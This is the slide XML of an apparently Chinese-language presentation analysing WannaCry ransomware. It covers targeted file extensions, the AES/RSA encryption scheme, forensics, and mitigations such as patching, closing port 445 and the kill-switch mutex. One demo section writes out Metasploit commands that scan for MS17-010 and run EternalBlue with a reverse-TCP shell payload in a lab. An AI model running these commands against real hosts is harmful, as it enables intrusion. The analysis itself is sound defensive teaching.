              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.mml .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sxm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otg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odg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uop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .std .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sxd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otp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odp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .wb2 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>slk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dif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stc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sxc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ots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ods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .3dm .max </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.3ds .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>uot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stw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sxw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ott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odt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pem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .p12 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>csr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crt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .key .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> .der</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353223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756023" y="2751457"/>
            <a:ext cx="4058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比较路径 是否是不加密的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>保证系统正常运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114224930-1920728088.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1D1256-D0ED-4E51-AD7F-4FE0548FD4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63" y="74645"/>
            <a:ext cx="6506417" cy="6693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197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756023" y="2751457"/>
            <a:ext cx="4058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创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加密文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114315301-496443041.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9AF6A24-EDF8-4DA7-889C-D272118421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23" y="843558"/>
            <a:ext cx="7164154" cy="5612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2439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0" y="2751457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加密流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加密文件的算法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>公钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>公钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>而私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在攻击者手里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加密文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对文件进行加密时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>首先会生成新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>公钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥进行加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>保存到要加密文件的开头部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WANACRY!)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>标识符之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>随后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥对文件进行加密</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114328068-1160744131.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E920F4B5-4FCD-49E1-9966-14EF2A0967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90" y="1040241"/>
            <a:ext cx="9054294" cy="140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https://images2018.cnblogs.com/blog/1225709/201805/1225709-20180528114415172-1952109159.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{330EBF4D-8C9D-4E1D-8808-FCA99E546A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0" y="5567880"/>
            <a:ext cx="12261619" cy="893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9240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二、恶意代码分析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0ABFC-D1D3-4C19-A622-45458483BB12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病毒总流程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2283E0-9259-4EFC-B545-5C2D5ED1229D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2873103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解密流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>每个被加密的文件均使用不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>若想对文件进行解密操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>需要先获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_B, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>将文件头的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥进行解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秘钥对文件进行解密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>而要获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则必须要获取私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_A,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>私钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>_A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是在攻击者手里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>理论上文件也就无法被解开</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138589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三、事故环境取证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C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314266" y="1166843"/>
            <a:ext cx="3334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弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"Select local source drive by clicking on the drive number"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对话框，如图所示。点击目标驱动器号，用于选择备份的硬盘。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EA98F3-E974-40CA-A9B7-3FC6F828C4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80" y="985607"/>
            <a:ext cx="7222802" cy="5621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0851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MS17-010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445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端口攻击）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782108-7F23-4263-8621-B8A4C49CAFED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="961254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 dirty="0"/>
              <a:t>演示分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>实验环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>kali,windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.1.200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	Windows 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.1.205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51CEC4-43C0-45E7-847C-FE6A8D4554D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223528" y="265833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查看目标主机是否存在此漏洞：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6F4787-5A39-4496-A372-9E57F6CF6E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2582049" y="3429000"/>
            <a:ext cx="3195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 &gt; search ms17-010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08A029-869B-485A-8A12-93821DAEB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339" y="4115258"/>
            <a:ext cx="12048661" cy="22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28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MS17-010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445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端口攻击）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6F4787-5A39-4496-A372-9E57F6CF6E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2562594" y="825100"/>
            <a:ext cx="63369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&gt; use auxiliary/scanner/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smb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/smb_ms17_010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&gt; set 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rhost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192.168.1.205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&gt; show options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71C96-D82E-4692-8977-1B934692F3DC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查看目标主机是否存在此漏洞：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B31C23-A60D-4E8B-9AF5-48D88138C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3117" y="2108269"/>
            <a:ext cx="10692233" cy="27795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FE8207-FDA5-4E7B-9E73-B12CB975BDD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483117" y="5243811"/>
            <a:ext cx="4834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 auxiliary(smb_ms17_010) &gt; run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3B6F00-B4A4-473E-A41D-EDAFD5719F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1139" y="5830296"/>
            <a:ext cx="10711321" cy="8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0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MS17-010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445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端口攻击）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6F4787-5A39-4496-A372-9E57F6CF6E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-96077" y="4966169"/>
            <a:ext cx="133132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&gt; use exploit/windows/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smb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/ms17_010_eternalblue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exploit(ms17_010_eternalblue) &gt; set payload windows/x64/shell /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reverse_tcp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   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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调用反向连接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shell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exploit(ms17_010_eternalblue) &gt; set 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rhost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192.168.1.205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exploit(ms17_010_eternalblue) &gt; set </a:t>
            </a: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lhost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192.168.1.200</a:t>
            </a:r>
          </a:p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 err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 exploit(ms17_010_eternalblue) &gt; show options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71C96-D82E-4692-8977-1B934692F3DC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入侵主机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CB7001-6F9E-4405-83A4-00C650E31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0769" y="0"/>
            <a:ext cx="8916699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05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MS17-010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445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端口攻击）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6F4787-5A39-4496-A372-9E57F6CF6E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451180" y="742260"/>
            <a:ext cx="5889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altLang="zh-CN" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>msf exploit(ms17_010_eternalblue) &gt; exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Times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71C96-D82E-4692-8977-1B934692F3DC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入侵主机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8362B3-3248-4894-A113-738516093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1097" y="1203925"/>
            <a:ext cx="8481635" cy="44225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F05BE4-6890-4F90-9607-BC0C5E19E83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428098" y="5973850"/>
            <a:ext cx="2315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成功获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell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2468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MS17-010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445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端口攻击）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71C96-D82E-4692-8977-1B934692F3DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="843558"/>
            <a:ext cx="2016224" cy="106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攻击检测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F05BE4-6890-4F90-9607-BC0C5E19E83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648784" y="1224569"/>
            <a:ext cx="6709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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口开启，并且存在高端口与内网地址建立连接，存疑。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BD855D-89FB-4C29-9F77-CCFE090CE0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3886" y="2346341"/>
            <a:ext cx="7504227" cy="36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05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四、解决方案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6E04DB-E9B9-4DA3-A7DD-56B9EF6A7383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573066" y="1090737"/>
            <a:ext cx="1023568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①打补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>此病毒能大范围传播正是由于很多机器没有打补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>被攻击之后导致中毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>没有中毒的机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>尽快打补丁可以避免中毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>但是已经中毒的打补丁也没用了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②关闭端口 此病毒所利用漏洞只要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关闭端口漏洞就无法利用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③创建互斥体 此办法只适用于未变种版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由于病毒会检测是否创建互斥体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MsWinZonesCacheCounterMutexA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户可自行创建此互斥体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这样病毒检测到互斥体就不会进行加密操作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④因为病毒是生成加密过的用户文件后再删除原始文件，所以存在通过文件恢复类工具恢复原始未加密文件的可能。但是因为病毒对文件系统的修改操作过于频繁，导致被删除的原始文件数据块被覆盖，致使实际恢复效果有限。且随着系统持续运行，恢复类工具恢复数据的可能性会显著降低。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2053495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06D24-CF3A-4E1E-9315-0E6AE675B841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="157485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五、结语</a:t>
            </a:r>
